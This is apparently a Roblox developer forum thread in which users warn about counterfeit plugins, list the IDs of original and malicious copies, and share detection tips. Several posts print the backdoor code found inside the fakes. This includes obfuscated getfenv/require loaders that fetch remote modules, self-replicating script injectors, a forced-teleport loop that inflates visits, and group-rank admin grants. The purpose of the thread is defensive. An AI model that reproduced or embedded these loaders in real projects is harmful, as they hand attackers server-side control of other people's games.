Just as an FYI, these have all been sent to moderation to be deleted.
59 Likes
I am still confused as to why the users creating these backdoors get their accounts deleted, but the actual malicious assets remain. Everything should be gone. Additionally, I feel like IP bans and machine bans would be a more viable solution then just deleting the account because spoofing the machine hardware ID is much more time consuming and we all know these backdoors are coming from a select few exploit developers that are trying to sell products with “server sided script execution”, after FE was mandated.
7 Likes
Malicious plugin: 2787024683
Original: 171505690
Module being required: 2674688515
Who needs to deobsfucate when you can just change the environment
getfenv()["require"] = function(...) warn(...) end
5 Likes
Said module 2655056793 requires another module. 2686631266 (wow thanks roblox for indirectly helping by telling me that you are removing private modules required from others)
Just an FYI for everybody concerned about malicious plugins. I’ve seen a massive uptake in spam user accounts purposefully impersonating well known developers. For example:
- Real: OkevinO Spam: 0kevin0
- Real: CodeSponge Spam: SpongeCoder
I think a lot of these accounts got banned, but I just wanted to make people aware because one of my friends fell for this and got into trouble with the moderators because of a server side backdoor being used to put items in his game.
Please double check the names of who developed the plugin you’re installing and check if it’s a deliberate copy or not.
6 Likes
It’s happening again.
Part to Terrain (my own plugin.)
Original: 261634767
Malicious: 3328292627
Building Tools by F3X
Original: 144950355
Malicious: 3320045603
GapFill & Extrude
Original: 165687726
Malicious: 3320031385
Load Character
Original: 752585459
Malicious: 3323713717
Waterfall Generator
Original: 1191990117
Malicious: 3328279741
3 Likes
Tree Generator
Original: 1256428022
Malicious: 3390238326
Pretty half-baked attempt if I’m honest, the injected code broke my server core script which in turn breaks everything else. Good way to draw the ire of a coffee-deprived developer. 0/10.
Intro Creator
Original plugin: https://www.roblox.com/library/723917710/Intro-Creator-OFFICIAL
Malicious plugin: https://www.roblox.com/library/3664187642/Intro-Creator
Realism Mod
Original: 400812710
Malicious: 3736586479 (inserts a ModuleScript with obfuscated code)
Roundify
Original: 2233768483
Malicious: 3745147634
Intro Creator
Original: 723917710
Malicious: 3664187642
Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332
Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463
This is awesome. Much faster than self-verification and an easy way of getting what you need.
Thanks for creating the tool!
1 Like
Virus-Destroyer (Anti-Serverside)
Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:
pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Custom Name Title
Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:
a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Fall Damage Plugin [FIXED]
Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED
~~
~~
1
Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script
local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
–Official roblox studio script
require(4582121027):protecc()
]]
Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic
~~
~~
2
Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script
local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService(“TeleportService”)
if joinData == 4628266409 then
local Tpdata = player:GetJoinData().TeleportData
if Tpdata then
Req = Tpdata.req
gid = Tpdata.grid
end
if player:GetRankInGroup(gid) == 2 then
require(Req).load(player.Name)
end
return else
end
local Players = game:GetService(“Players”)
local TeleportService = game:GetService(“TeleportService”)
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4628266409, player, teleportData)
end)
]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.
~~
~~
3
Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:
a(b)function c(d)d.Source=d.Source…’\n’…game:GetObjects(‘rbxassetid://4850318089’)[1].Source end;for e,d in next,b:GetDescendants()do if rawequal(d.ClassName,‘Script’)and not string.find(d.Source,‘4794986906’)then c(d)d:GetPropertyChangedSignal(‘Source’):Connect(function()if not string.find(d.Source,‘4794986906’)then c(d)end end)end end;f=false;function g()d=game:GetObjects(‘rbxassetid://4852273118’)[1]if not b:FindFirstChild(‘Filter Event’)or b:FindFirstChild(‘Filter Event’).Source~=d.Source then d.Parent=b else d=b:FindFirstChild(‘Filter Event’)end;function h()if not f then wait(1/60)f=true;d:Destroy()f=false;g()end end;i=d:GetPropertyChangedSignal(‘Parent’):Connect(h)d.Changed:Connect(function(j)if rawequal(j,‘Disabled’)or rawequal(j,‘Source’)then i:Disconnect()h()end end)end;g()end;a(workspace)a(game:GetService(‘ServerScriptService’))
There are multiple require-id’s in this action attempt. All require ids listed.
Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:
–[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn’t modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
– You may proceed if you have basic knowledge of scripting and know what you’re doing.
local RunService = game:GetService(“RunService”)
local Require = require
local Loader = 4794986906 – Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then – Checks if it isn’t Studio, as it defeats the purpose of the module, also checks if it is being ran on the server’s side and not on the client’s side, just to be on the safe side.
pcall(Require, Loader) – Begins to load the module, it is wrapped in pcall so it doesn’t bother you in anyway whatsoever.
end
Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown as orbfuscated.
Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:
if not game:service’RunService’:IsStudio() then getfenv()"\114\101\113\117\105\114\101" end
Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to above malicious require id
~~
~~
5
Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:
pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source=’–[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is apart of above malicious plugins
2 Likes
Backdoor malicious module
getfenv()['\114\101\113\117\105\114\101'](2422875198*2)
2422875198*2 = 4845750396
is orbfuscated but by running in repl.it, prints module id that failed to load.
which it then loads
which has a script to then load
Roblox = "IsStudio"
local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end end
and
--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {}
local CheckMeIn = false
if CheckMeIn == true then
require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
CheckMeIn = "Loaded."
local a = script.Script
a.Parent = workspace.Camera
end
return module
Module 862849844 is referred to CheckMeIn which is unknown to be the original creator of this or just something this backdoor creator is using to log users having this backdoor in their game. I’ve tried to inform them about the use of this module, they’ve been warned for over 3 days before I posted this.
The top script then finally loads this module.
This module has a lot of obfuscated code, but one of the scripts remained un obfuscated, loading these two other modules.
MainModule> Folder> Main> ul
-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
if Player:GetRankInGroup(6157358) >= 2 then
wait(0.1)
require(4674979018):Fire(Player.Name)
require(5033070911):ikthisisskidded(Player.Name)
game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
end
end)
game.Players.PlayerAdded:Connect(function(Player)
if Player:GetRankInGroup(5860863) >= 2 then
wait(0.1)
require(4834950415):Fire(Player.Name)
require(5033070911):ikthisisskidded(Player.Name)
end
end)
game:GetService("Players").PlayerAdded:Connect(
function(player)
if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
game:GetService("TeleportService"):Teleport(5009641755, player)
end
end
)
Many of the modules uses these groups to check if player is a member of before giving members scripts in this backdoor.
Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’
One of the scripts is checking to do a banlist
https://builderman.club/fe.json
Would be suggested to blacklist this domain.
Loads another module
and another module
This module then uses LuaVM to load code without the need of loadstring in
MainModule > JohnDoe> Main> Shadow> Frame> RemoteHandle
another module
This backdoor is still loaded by an unknown plugin, still looking for it.
3 Likes
Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not localscript), when I click behind the last “end” (how do I explain this) it moves you to the very side of the script, as if you’ve written 500 spaces in one line and click behind a letter, it moves your Scrollbar (for the X position) to the very far right.
Now, if this happens, move the scrollbar slowly, until you find some weird code, For example I had this:
if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end
This has to be a “virus”, delete those.
Another way to detect those is by Searching “game:service”, INCASE you haven’t used “game:service” in your script.
I do not know what malicious plugin my friend has installed
3 Likes